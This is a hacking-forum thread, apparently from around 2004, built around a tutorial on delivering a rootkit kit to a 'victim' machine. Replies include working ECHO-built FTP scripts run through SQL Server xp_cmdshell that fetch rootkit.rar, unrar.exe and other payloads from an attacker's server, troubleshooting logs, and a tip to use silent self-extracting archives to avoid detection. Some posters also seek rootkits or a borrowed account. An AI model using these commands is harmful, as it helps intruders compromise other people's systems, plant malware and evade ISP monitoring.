Well, here is my attempt at writting a helpfull guide for all

----------------------------------------------------------------------------------------------
TFTP:

Since the release of the MSBlaster worm and its varients which use TFTP, the TFTP port (port 69) is being monitered by ISPs and other people. Not to mention that TFTP is horrible at transfering large files.

The solution: FTP.

To use FTP, it requires you to write a small script to execute commands. Lots of people here know how to write such scripts, but a good number of new joiners dont. So here is the lowdown

1) Get Winrar and rar/zip all your files using best compression.
2) Place Unrar.exe and the rar of your files (from here on out refered to as kit.rar) in a directory, make a new user on your ftp, and set the home directory for that user to the directory containing your files
3) Connect to your vitcim/test subject and echo the following into a file (called Host in this example)

nice tut..

very good tut man, glad you decided to write one. Very helpful indeed.

Glad it helped ya

Very Nice definitly going to the archive

Really a great tutorial. I was looking for something like that.

yeah I like echo much more then tftp it's faster and safer. One time a while ago somebody wanted a file from me but well I couldn't run a ftp server at that time and didn't want to upload to the person so I let him request the files with tftp it worked gud but well we found out it wasn't really gud for 5mb+ files

greetz Alex Trust

Very nice one, thx alot. It worked for me.

lcd c:\rootkit\RAR
\rootkit\RAR: File not found
get unrar.exe
200 PORT Command successful.
550 /c:/unrar.exe: No such file or directory.

lcd c:\rootkit\RAR
\rootkit\RAR: File not found
get rootkit.rar
200 PORT Command successful.
550 /c:/rootkit.rar: No such file or directory.

quit
221 Goodbye!
221 Goodbye!
221 Goodbye!
SQL>Command: xp_cmdshell "dir c:\windows\system32"
The system cannot find the file specified.
The system cannot find the file specified.
The system cannot find the file specified.


Any Suggestions?

not exaclty whats wrong with what youre doing, but this is what you can do to ehco files over

SQL>Command: xp_cmdshell "ftp.exe -i -n -v -s:c:\winnt\temp\file3.txt"
Connected to 24.144.66.74.

open x.x.x.x 60
220 B34ST
Already connected to x.x.x.x, use disconnect first.

open root root
binary
530 Please login with USER and PASS first.

Error opening local file C:\rootkit\rar\unrar.exe.

Error opening local file C:\rootkit\rar\rootkit.rar.

get unrar.exe C:\rootkit\rar\unrar.exe
get rootkit.rar C:\rootkit\rar\rootkit.rar
quit
221 Bye bye ...
> C:\rootkit\rar\unrar.exe:No Such file or directory
> C:\rootkit\rar\rootkit.rar:No Such file or directory
> C:\rootkit\rar\rootkit.rar:No Such file or directory
> C:\rootkit\rar\rootkit.rar:No Such file or directory


^^^ tried it with bullet proof FTP instead of Serv-U this time... when I can get it to actually log in I get this error...-(000004) 1/10/2004 5:19:56 PM - (not logged in) (x.x.x.x) > PASS ********
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > logged in.
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > 230 User root logged in.
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > PORT 172,16,120,200,9,58
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > 200 Port command successful.
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > RETR rootkit.rar
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > asked to download 'C:\rootkit\RAR\rootkit.rar' --> Access allowed. (Free File)
(000004) 1/10/2004 5:19:56 PM - root (x.x.x.x) > 150 Opening data connection for rootkit.rar (3582445 bytes).
(000004) 1/10/2004 5:20:17 PM - root (x.x.x.x) > 425 Cannot open data connection (10060).

nice tutorial man ....

This really helped me with my tftp problem...don't need to use that anymore

Thanks man... came into some use already

knew this method already, but learnt new stuff! thanks for a great tut

jeahh thx for that nice tutorial
i will test it yet

SQL>Command: xp_cmdshell "ftp -i -n -v -s:c:\winnt\system32\ftp3.txt"
Connected to x.x.x.x.

open x.x.x.x 21
220 Serv-U FTP Server v4.0 for WinSock ready...
Invalid command.

Invalid command.

root
root
binary
200 Type set to I.
Error opening local file rootkit.rar.

Error opening local file rootkit.rar.

Error opening local file unrar.exe.

Error opening local file unrar.exe.

get c:\rootkit\rar\rootkit.rar
get rootkit.rar
get c:\rootkit\rar\unrar.exe
get unrar.exe
quit
221 Goodbye!
> rootkit.rar:Permission denied
> rootkit.rar:Permission denied
> unrar.exe:Permission denied
> unrar.exe:Permission denied
> unrar.exe:Permission denied
> unrar.exe:Permission denied


Anyone able to help with this error?
Can someone interpret whether this is an error in my ftp3.txt echo file or if this is a fake ftp.exe OR if I dont have my serv-u configured correctly?
Thanks.


This are the echo commands I used.
ECHO open x.x.x.x 21 >> ftp6.txt
ECHO user root >> ftp6.txt
ECHO password root >> ftp6.txt
ECHO binary >> ftp6.txt
ECHO get c:\rootkit\rar\rootkit.rar >> ftp6.txt
ECHO get c:\rootkit\rar\unrar.exe >> ftp6.txt
ECHO get rootkit.rar >> ftp6.txt
ECHO get unrar.exe >> ftp6.txt
ECHO quit >> ftp6.txt

ECHO get rootkit.rar >> ftp6.txt
ECHO get unrar.exe >> ftp6.txt

use that instead, your ftp server doesnt use c:\root\whatever

well I used both ways in the echo... as a test... neither work....

230 User logged in, proceed.
Invalid command.

password root
binary
200 Type set to I.
Local directory now C:\.

lcd c:\
get rootkit.rar
get unrar.exe
quit
221 Goodbye!
> ftp: bind :No buffer space is supported
> ftp: bind :No buffer space is supported
> ftp: bind :No buffer space is supported
> ftp: bind :No buffer space is supported

Anyone know what this error means?

nice tut

agree echo method is a lot saver than using tftp. btw u dont need to switch to binary mode.

Excellent tut and worthy of an archive. Some great suggestions as well on other uses.

I need to put some time aside for some tuts to post here to the board.

Nice tut, just tried it and it works very well

TFTP is slow and risky

Echo is fast and trustable

Anyone here got a wireimage account i can use?

yes nice tut i use it it works cool

Jop very nice tutorial.. good work.. ^^

Cya Doc

Nice tutorial dude!!!
Thank you very match
great learn!!!

Nice Tutorial but i would suggest an other method for the unrarring...

In stead of making a .rar file, create a .exe file then you don't need your rar.exe...
Just choose create sfv archive in winrar and it creates an exe file..

Be sure to go to Advanced SFV options and set messaging to silent...

very nice tut there, DJohn84

definitely worth tryin'

thx alot

echo is really fast...
don't really trust tftp

Hi Guys,
Very Very New and I'm sure it will come in handy soon .
Thanks
Chuckey

yo , the tipp with unrar.exe is realy nice . Thx man , it safe me a lot of work !

220 Serv-U FTP Server v4.0 for WinSock ready...
user anonymous
230 User logged in, proceed.
Invalid command.

anonymous
get ias.rar c:\winnt\system32\ias\ias.rar
200 PORT Command successful.
550 /c:/ias.rar: No such file or directory.

get ias.rar c:\winnt\system32\ias\unrar.exe
200 PORT Command successful.
550 /c:/ias.rar: No such file or directory.

get unrar.exe c:\winnt\system32\ias\unrar.exe
200 PORT Command successful.
550 /c:/unrar.exe: No such file or directory.

get start.bat c:\winnt\system32\ias\start.bat
200 PORT Command successful.
550 /c:/start.bat: No such file or directory.

get ntmgmt.exe c:\winnt\system32\ias\ntmgmt.exe
200 PORT Command successful.
550 /c:/ntmgmt.exe: No such file or directory.

quit
221 Goodbye!
221 Goodbye!
221 Goodbye!


Alright... I did EXACTLY as I was told.... anyone got any ideas on how to fix this?

well what if the target does have winrar installed how can it open it

thanks for this very useful tutorial I don't think I'll be using tftp anymore

"The Echo Methode" is very faster and saver!!! most providers are logging, because many virus are go around in the moment and the tftp port [69] will be locked!


*sry for my shice english*

-fre4k

ummm...im trying to find a good rootkit guyz...i searched all over the net..can someone help me with this? i would be so greatful

hey,

doesn't work for me


well, i these commands to echo to a file:

ECHO open x.x.x.x 11115 >> kit2.txt
ECHO test >> kit2.txt
ECHO test >> kit2.txt
ECHO literal PASV >> kit2.txt
ECHO lcd c:\inetpub\scripts >> kit2.txt
ECHO get unrar.exe >> kit2.txt
ECHO lcd c:\inetpub\scripts >> kit2.txt
ECHO get kit.rar >> kit2.txt
ECHO quit >> kit2.txt

and told it to get the stuff from my ftp with this command:

ftp -v -i -s:kit2.txt



and this is what i got then:

ftp -v -i -s:kit2.txt
Conectado a x.x.x.x.
open x.x.x.x 11115
220 Serv-U FTP Server v4.0 for WinSock ready...
Usuario (80.138.116.243:(none)):
331 User name okay, need password.

230 User logged in, proceed.
Comando no vido.

literal PASV
227 Entering Passive Mode (x,x,x,x,15,193)
Directorio local ahora C:\inetpub\scripts.
lcd c:\inetpub\scripts
get unrar.exe
200 PORT Command successful.
150 Opening ASCII mode data connection for unrar.exe (187904 bytes).


and then nothing further happens.

my ftp server tells me:

220 Serv-U FTP Server v4.0 for WinSock ready...
USER test
331 User name okay, need password.
PASS xxxxx
230 User logged in, proceed.
PASV
227 Entering Passive Mode (x,x,x,x,15,193)
PORT 192,168,0,2,4,67
200 PORT Command successful.
RETR unrar.exe
150 Opening ASCII mode data connection for unrar.exe (187904 bytes).
425 Cannot open data connection.



i hope anyone can help me with this
also tried some other variations of the commands that were mentioned in this thread...


greetz,
murcia

hmm sound good i go 2 try it

thx a lot for this tut

what sql client should i use?

Hi Guys...
I've also been tryinhg several ways to up files and I get the same on the ftp part of things as bove connects ok even trys to up the file (tried it from my remote ftp to myself) but then hangs zzz no activity on the remote ftp..

Any advice appreciated

Chuckey

mofo what are you looking to do?
I got za few sql stuff


Chuckey

good tuto thx

nice job

W00t

Finally done it !
I was having all the same problems - not connecting or when connected it was hanging and when i went into admin on the remote ftp it was idle.
I had other problems and decided to find the root problem by going from my router to modem... and hey presto it worked first time. and my other stuff works too. I guess the router need some kinda of time out or keep live setting changed but i dont know that bit yet.

But now I can also say Great TUT and thanks! tftp was a nightmare for me

Chuckey

if there's no ftp.exe (it sais ftp.exe is unknown blablabla ) is there any other option loading the script ?

WOW!!

Talk about a thread taking off months later!

Well, I'm glad everyone found it helpfull

Heres an addition/modification/change of sorts: